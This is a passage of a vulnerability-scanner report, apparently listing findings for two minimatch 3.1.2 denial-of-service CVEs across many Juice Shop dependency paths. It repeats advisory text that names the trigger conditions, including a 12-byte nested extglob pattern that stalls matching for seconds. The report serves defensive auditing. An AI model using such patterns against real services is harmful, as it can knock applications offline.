+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 146: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 147: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/fstream/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 148: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ignore-walk/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 149: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/node-pre-gyp/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 150: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/rimraf/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 151: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/sqlite3/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 152: CVE-2026-27903 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 407 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/ts-node-dev/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: minimatch: Denial of Service due to unbounded recursive backtracking via crafted glob patterns
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.3, matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() + API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No +memoization or call budget exists to bound this behavior. Any +application where an attacker can influence the glob pattern passed to minimatch() + is vulnerable. The realistic attack surface includes build tools and +task runners that accept user-supplied glob arguments (ESLint, Webpack, +Rollup config), multi-tenant systems where one tenant configures +glob-based rules that run in a shared process, admin or developer +interfaces that accept ignore-rule or filter configuration as globs, and + CI/CD pipelines that evaluate user-submitted config files containing +glob patterns. An attacker who can place a crafted pattern into any of +these paths can stall the Node.js event loop for tens of seconds per +invocation. The pattern is 56 bytes for a 5-second stall and does not +require authentication in contexts where pattern input is part of the +feature. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and +3.1.3 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.3

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-27903
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/0bf499aa45f5059b56809cc3b75ff3eafeb8d748
+https://github.com/isaacs/minimatch/security/advisories/GHSA-7r86-cg39-jmmj
+https://nvd.nist.gov/vuln/detail/CVE-2026-27903
+https://www.cve.org/CVERecord?id=CVE-2026-27903

+ + + + + + + +
+
+
+
+ Finding 153: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver-utils/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 154: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/archiver/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:7896
+https://access.redhat.com/security/cve/CVE-2026-27904
+https://bugzilla.redhat.com/2441268
+https://bugzilla.redhat.com/2442922
+https://bugzilla.redhat.com/2448754
+https://bugzilla.redhat.com/2453151
+https://bugzilla.redhat.com/show_bug.cgi?id=2441268
+https://bugzilla.redhat.com/show_bug.cgi?id=2442922
+https://bugzilla.redhat.com/show_bug.cgi?id=2448754
+https://bugzilla.redhat.com/show_bug.cgi?id=2453151
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-21710
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-26996
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27135
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-27904
+https://errata.almalinux.org/9/ALSA-2026-7896.html
+https://errata.rockylinux.org/RLSA-2026:7896
+https://github.com/isaacs/minimatch
+https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce
+https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74
+https://linux.oracle.com/cve/CVE-2026-27904.html
+https://linux.oracle.com/errata/ELSA-2026-8339.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-27904
+https://www.cve.org/CVERecord?id=CVE-2026-27904

+ + + + + + + +
+
+
+
+ Finding 155: CVE-2026-27904 Minimatch 3.1.2 + + + + lang-pkgs + + node-pkg + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 1333 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
minimatch3.1.2
+ + + + + + + +
File Path
juice-shop/node_modules/file-js/node_modules/minimatch/package.json
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions
+Target: Node.js
+Type: node-pkg
+Fixed version: 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, 3.1.4

+

minimatch is a minimal matching utility for converting glob +expressions into JavaScript RegExp objects. Prior to version 10.2.3, +9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() + stalls for over 7 seconds. Adding a single nesting level or a few input + characters pushes this to minutes. This is the most severe finding: it +is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.

+ + +
Mitigation
+

